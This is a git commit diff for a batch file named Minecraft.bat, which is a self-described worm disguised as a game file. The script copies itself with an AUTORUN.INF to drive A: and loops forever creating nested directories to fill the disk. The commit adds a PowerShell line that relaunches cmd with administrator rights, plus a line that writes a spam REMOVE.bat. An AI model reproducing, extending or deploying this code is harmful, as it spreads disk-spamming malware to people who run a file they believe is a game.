Update Minecraft.bat
This commit is contained in:
parent
66356d7110
commit
5d453ee9bc
1 changed files with 4 additions and 1 deletions
|
@ -1,4 +1,5 @@
|
|||
@echo off
|
||||
@powershell Start-Process cmd -Verb runas
|
||||
echo off
|
||||
echo "You fell for my WORM!"
|
||||
copy Minecraft.bat A:\
|
||||
copy AUTORUN.INF A:\
|
||||
|
@ -13,5 +14,7 @@ echo Prepare for the disk spam.
|
|||
:spamc
|
||||
mkdir FUCKED_BY_BATWORM
|
||||
cd FUCKED_BY_BATWORM
|
||||
echo msg * error > REMOVE.bat
|
||||
echo HAXXED! > readme.txt
|
||||
title FUCKING PC: %random%
|
||||
goto spamc
|
Loading…
Add table
Add a link
Reference in a new issue